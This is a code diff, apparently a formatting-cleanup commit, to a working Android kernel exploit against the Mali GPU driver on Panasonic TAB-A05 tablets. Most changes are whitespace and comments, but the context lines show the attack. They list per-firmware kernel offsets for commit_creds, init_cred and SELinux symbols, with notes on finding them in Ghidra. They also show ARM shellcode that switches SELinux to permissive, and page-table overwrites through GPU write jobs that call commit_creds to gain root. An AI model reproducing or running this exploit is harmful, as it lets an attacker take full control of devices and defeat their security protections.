最終調整

mali_base_jm_kernel.h

@@ -831,7 +831,6 @@ struct base_jd_atom_v2 {
 //	__u8 jobslot;			//missing from Bifrost r16p0
 	base_jd_core_req core_req;
 //	__u8 renderpass_id;		//missing from Bifrost r16p0
-	
 };
 */
 typedef struct base_jd_atom_v2 {
@@ -1233,4 +1232,3 @@ struct base_dump_cpu_gpu_counters {
 };
 
 #endif /* _UAPI_BASE_JM_KERNEL_H_ */
-

mali_shrinker_mmap32.c

@@ -22,7 +22,7 @@
 #include <android/log.h>
 #define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
 
-#endif //SHELL
+#endif // SHELL
 
 #define MALI "/dev/mali0"
 
@@ -36,7 +36,7 @@
 
 #define SPRAY_NUM 64
 
-#define FLUSH_SIZE (0x1000 * 0x1000)		//increasing = less 'out of memory' results but more crashes (default 0x1000 * 0x100)
+#define FLUSH_SIZE (0x1000 * 0x1000) // increasing = less 'out of memory' results but more crashes (default 0x1000 * 0x100)
 
 #define SPRAY_CPU 0
 
@@ -50,7 +50,7 @@
 
 #define NUM_TRIALS 100
 
-#define KERNEL_BASE 0x40080000//raven's kernel load address
+#define KERNEL_BASE 0x40080000
 
 #define OVERWRITE_INDEX 256
 
@@ -63,17 +63,17 @@
 #define ADD_COMMIT_INDEX 3
 
 /*
-base address = do_undefinstr - 0x1000
-COMMIT_CREDS = commit_creds - base address
-AVC_DENY= avc_denied.isra.4 - base address
-SEL_READ_ENFORCE = sel_read_enforce - base address
-SEL_READ_HANDLE_UNKNOWN = sel_read_handle_unknown - base address
+KERNEL_BASE = do_undefinstr - 0x1000
+COMMIT_CREDS = commit_creds - KERNEL_BASE
+AVC_DENY= avc_denied.isra.4 - KERNEL_BASE
+SEL_READ_ENFORCE = sel_read_enforce - KERNEL_BASE
+SEL_READ_HANDLE_UNKNOWN = sel_read_handle_unknown - KERNEL_BASE
 
 Need: Ghidra
 Search: prepare_kernel_cred ->
-INIT_CRED = mov - base address
+INIT_CRED = mov - KERNEL_BASE
 Search: sel_read_enforce ->
-SELINUX_ENFORCING = ldr - base address
+SELINUX_ENFORCING = ldr - KERNEL_BASE
 
 Need: ARM to HEX
 ADD_COMMIT = add x8, x8, #0x(Last 3 digits of INIT_CRED)
@@ -83,13 +83,16 @@ ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED)
 // TAB-A05-BD 01.00.000
 #define SELINUX_ENFORCING_CTX_01_00_000 0x129d9bc
 #define SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000 0x365d80 // 0xffffff80083e5d80 - 0xffffff8008080000 = 0x365d80
-#define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8 //0xffffff80083e53a8 - 0xffffff8008080000 = 0x3653A8 //add
-#define INIT_CRED_CTX_01_00_000 0x11553f0 //0xffffff80091d53f0 - 0xffffff8008080000 = 0x11553F0
-#define COMMIT_CREDS_CTX_01_00_000 0x5a120 //0xffffff80080da120 - 0xffffff8008080000 = 0x5a120
+#define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8 // 0xffffff80083e53a8 - 0xffffff8008080000 = 0x3653A8 //add
+#define INIT_CRED_CTX_01_00_000 0x11553f0 // 0xffffff80091d53f0 - 0xffffff8008080000 = 0x11553F0
+#define COMMIT_CREDS_CTX_01_00_000 0x5a120 // 0xffffff80080da120 - 0xffffff8008080000 = 0x5a120
 #define ADD_INIT_CTX_01_00_000 0x910fc000
 #define ADD_COMMIT_CTX_01_00_000 0x91048108
-//avc_denied.isra.4
-#define AVC_DENY_CTX_01_00_000 0x35acc8 //0xffffff80083dacc8 - 0xffffff8008080000 = 0x35ACC8;//add
+#define AVC_DENY_CTX_01_00_000 0x35acc8 // 0xffffff80083dacc8 - 0xffffff8008080000 = 0x35ACC8;//add
+
+/*
+ * Maintained by Syuugo
+ */
 
 // TAB-A05-BD 01.01.001
 #define COMMIT_CREDS_CTX_01_01_001 0x5a120
@@ -180,7 +183,7 @@ static uint64_t avc_deny;
 static uint64_t selinux_enforcing_READ = 0X0;
 static uint64_t selinux_enforcing_WRITE = 0X0;
 /*
-Overwriting SELinux to permissive
+  Overwriting SELinux to permissive
   strb wzr, [x0]
   mov x0, #0
   ret
@@ -201,15 +204,15 @@ static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE];
 
 
 struct base_mem_handle {
-	struct {
-		__u64 handle;
-	} basep;
+  struct {
+    __u64 handle;
+  } basep;
 };
 
 struct base_mem_aliasing_info {
-	struct base_mem_handle handle;
-	__u64 offset;
-	__u64 length;
+  struct base_mem_handle handle;
+  __u64 offset;
+  __u64 length;
 };
 
 static int open_dev(char* name) {
@@ -225,11 +228,11 @@ void setup_mali(int fd, int group_id) {
   if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, &param) < 0) {
     err(1, "version check failed\n");
   }
-  //struct kbase_ioctl_set_flags set_flags = {group_id << 3};
+  // struct kbase_ioctl_set_flags set_flags = {group_id << 3};
   struct kbase_ioctl_set_flags set_flags = {0};
   if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) {
     err(1, "set flags failed\n");
-  } 
+  }
 }
 
 
@@ -258,7 +261,7 @@ void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) {
 uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages, uint64_t gpu_alloc_addr, uint64_t* gpu_alloc_region) {
   struct base_jit_alloc_info info = {0};
   struct base_jd_atom_v2 atom = {0};
-  
+
   info.id = id;
   info.gpu_alloc_addr = gpu_alloc_addr;
   info.va_pages = va_pages;
@@ -276,7 +279,7 @@ uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages
   if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
     err(1, "submit job failed\n");
   }
-  return *((uint64_t*)gpu_alloc_region); 
+  return *((uint64_t*)gpu_alloc_region);
 }
 
 void jit_free(int fd, uint8_t atom_number, uint8_t id) {
@@ -295,7 +298,7 @@ void jit_free(int fd, uint8_t atom_number, uint8_t id) {
   if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
     err(1, "submit job failed\n");
   }
-    
+
 }
 
 void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results) {
@@ -436,7 +439,7 @@ void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
     alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; // | (1 << 22);
     int prot = PROT_READ | PROT_WRITE;
     alloc.in.va_pages = pages;
-    alloc.in.commit_pages = pages; //alloc.in.commit_pages = 0;
+    alloc.in.commit_pages = pages; // alloc.in.commit_pages = 0;
     mem_alloc(mali_fd, &alloc);
     reserved_va[i] = alloc.out.gpu_va;
   }
@@ -478,7 +481,7 @@ uint64_t alias_sprayed_regions(int mali_fd) {
     }
     alias_regions[i] = this_region;
   }
-  // return (uint64_t)(alias_regions[0]);
+  //return (uint64_t)(alias_regions[0]);
   return (uint64_t)alias.out.gpu_va;
 }
 
@@ -540,7 +543,7 @@ uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
   int32_t immlo = (offset >> 12) & 0x3;
   uint32_t adpr = rd & 0x1f;
   adpr |= (1 << 28);
-  adpr |= (1 << 31); //op
+  adpr |= (1 << 31); // op
   adpr |= immlo << 29;
   adpr |= (immhi_mask & (immhi << 5));
   return adpr;
@@ -549,10 +552,10 @@ uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
 void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {
 
   uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
-  //Sets x0 to init_cred
+  // Sets x0 to init_cred
   root_code[ADRP_INIT_INDEX] = init_adpr;
   root_code[ADD_INIT_INDEX] = add_init;
-  //Sets x8 to commit_creds
+  // Sets x8 to commit_creds
   root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
   root_code[ADD_COMMIT_INDEX] = add_commit;
   root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
@@ -563,10 +566,10 @@ void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_en
 
 void fixup_root_shell_nop() {
 
-  //Sets x0 to init_cred
+  // Sets x0 to init_cred
   root_code[ADRP_INIT_INDEX] = 0xD503201F;
   root_code[ADD_INIT_INDEX] = 0xD503201F;
-  //Sets x8 to commit_creds
+  // Sets x8 to commit_creds
   root_code[ADRP_COMMIT_INDEX] = 0xD503201F;
   root_code[ADD_COMMIT_INDEX] = 0xD503201F;
   root_code[4] = 0xD503201F; // stp x29, x30, [sp, #-0x10]
@@ -578,10 +581,10 @@ void fixup_root_shell_nop() {
 void fixup_root_shell_un(uint64_t init_cred, uint64_t commit_cred, uint64_t read_handle_unknown, uint32_t add_init, uint32_t add_commit) {
 
   uint32_t init_adpr = write_adrp(0, read_handle_unknown, init_cred);
-  //Sets x0 to init_cred
+  // Sets x0 to init_cred
   root_code_un[ADRP_INIT_INDEX] = init_adpr;
   root_code_un[ADD_INIT_INDEX] = add_init;
-  //Sets x8 to commit_creds
+  // Sets x8 to commit_creds
   root_code_un[ADRP_COMMIT_INDEX] = write_adrp(8, read_handle_unknown, commit_cred);
   root_code_un[ADD_COMMIT_INDEX] = add_commit;
   root_code_un[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
@@ -609,7 +612,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e
   struct MALI_JOB_HEADER jh = {0};
   jh.is_64b = true;
   jh.type = MALI_JOB_TYPE_WRITE_VALUE;
-  
+
   struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
   payload.type = type;
   payload.immediate_value = value;
@@ -777,7 +780,7 @@ void select_offset() {
     fixup_root_shell(INIT_CRED_CTZ_01_02_004, COMMIT_CREDS_CTZ_01_02_004, SEL_READ_HANDLE_UNKNOWN_CTZ_01_02_004, ADD_INIT_CTZ_01_02_004, ADD_COMMIT_CTZ_01_02_004);
     return;
   }
-  
+
   if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.02.005/01.02.005:user/release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_CTZ_01_02_005;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_01_02_005;
@@ -832,22 +835,22 @@ void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved
   //Triggers avc_denied to disable SELinux
   open("/dev/kmsg", O_RDONLY);
   */
-//  uint64_t sel_read_enforce_addr = (((selinux_enforcing_READ + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
-//  write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
-//  printf("sel_read_enforce_addr is %llx  avc_deny_addr is %llx\n", sel_read_enforce_addr, avc_deny_addr);
+  //uint64_t sel_read_enforce_addr = (((selinux_enforcing_READ + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
+  //write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+  //printf("sel_read_enforce_addr is %llx  avc_deny_addr is %llx\n", sel_read_enforce_addr, avc_deny_addr);
 
  uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
   write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_handle_unknown_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
-  
-//  uint64_t sel_write_enforce_addr = (((selinux_enforcing_WRITE + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
-//  write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_write_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
-  
+
+  //uint64_t sel_write_enforce_addr = (((selinux_enforcing_WRITE + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
+  //write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_write_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
   usleep(100000);
-  
-  //Call commit_creds to overwrite process credentials to gain root
+
+  // Call commit_creds to overwrite process credentials to gain root
   write_func(mali_fd2, sel_read_handle_unknown, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code_un[0]), sizeof(root_code_un)/sizeof(uint32_t));
-//  write_func(mali_fd2, selinux_enforcing_READ, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
-//    write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
+  //write_func(mali_fd2, selinux_enforcing_READ, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
+  //write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
 }
 
 
@@ -884,7 +887,7 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
     err(1, "gpu_alloc_region mmap failed");
   }
   uint64_t jit_pages = SPRAY_PAGES;
-  uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, jit_pages, (uint64_t)gpu_alloc_addr, (uint64_t*)gpu_alloc_region); 
+  uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, jit_pages, (uint64_t)gpu_alloc_addr, (uint64_t*)gpu_alloc_region);
   atom_number++;
   mem_flags_change(mali_fd, (uint64_t)jit_addr, BASE_MEM_DONT_NEED, 0);
 
@@ -921,12 +924,12 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
       atom_number++;
       write_selinux(mali_fd, mali_fd2, pgd, &(reserved[0]));
       usleep(100000);
-      write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));	
+      write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
       usleep(100000);
       printf("time to run_enforce\n");
-      run_enforce();      
-      run_enforce_un();     
-      //run_enforce_write(); 
+      run_enforce();
+      run_enforce_un();
+      //run_enforce_write();
       cleanup(mali_fd, pgd);
       return 0;
     }

midgard.h

@@ -1,7 +1,7 @@
 #ifndef MIDGARD_H
 #define MIDGARD_H
 
-//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone
+// Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone
 
 #include <stdio.h>
 #include <stdint.h>
@@ -41,7 +41,7 @@ __gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end)
 {
    uint64_t val = 0;
    const int width = end - start + 1;
-   const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1 );
+   const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1);
 
    for (int byte = start / 8; byte <= end / 8; byte++) {
       val |= ((uint64_t) cl[byte]) << ((byte - start / 8) * 8);
@@ -64,13 +64,13 @@ enum mali_job_type {
 };
 
 enum mali_write_value_type {
-        MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER  =      1,
+        MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER    =      1,
         MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP =      2,
-        MALI_WRITE_VALUE_TYPE_ZERO           =      3,
-        MALI_WRITE_VALUE_TYPE_IMMEDIATE_8    =      4,
-        MALI_WRITE_VALUE_TYPE_IMMEDIATE_16   =      5,
-        MALI_WRITE_VALUE_TYPE_IMMEDIATE_32   =      6,
-        MALI_WRITE_VALUE_TYPE_IMMEDIATE_64   =      7,
+        MALI_WRITE_VALUE_TYPE_ZERO             =      3,
+        MALI_WRITE_VALUE_TYPE_IMMEDIATE_8      =      4,
+        MALI_WRITE_VALUE_TYPE_IMMEDIATE_16     =      5,
+        MALI_WRITE_VALUE_TYPE_IMMEDIATE_32     =      6,
+        MALI_WRITE_VALUE_TYPE_IMMEDIATE_64     =      7,
 };
 
 
@@ -240,7 +240,7 @@ struct mali_write_value_job_packed {
    uint32_t opaque[14];
 };
 
-#define MALI_JOB_HEADER_header                  \
+#define MALI_JOB_HEADER_header \
    .is_64b = true
 
 #define MALI_WRITE_VALUE_JOB_LENGTH 56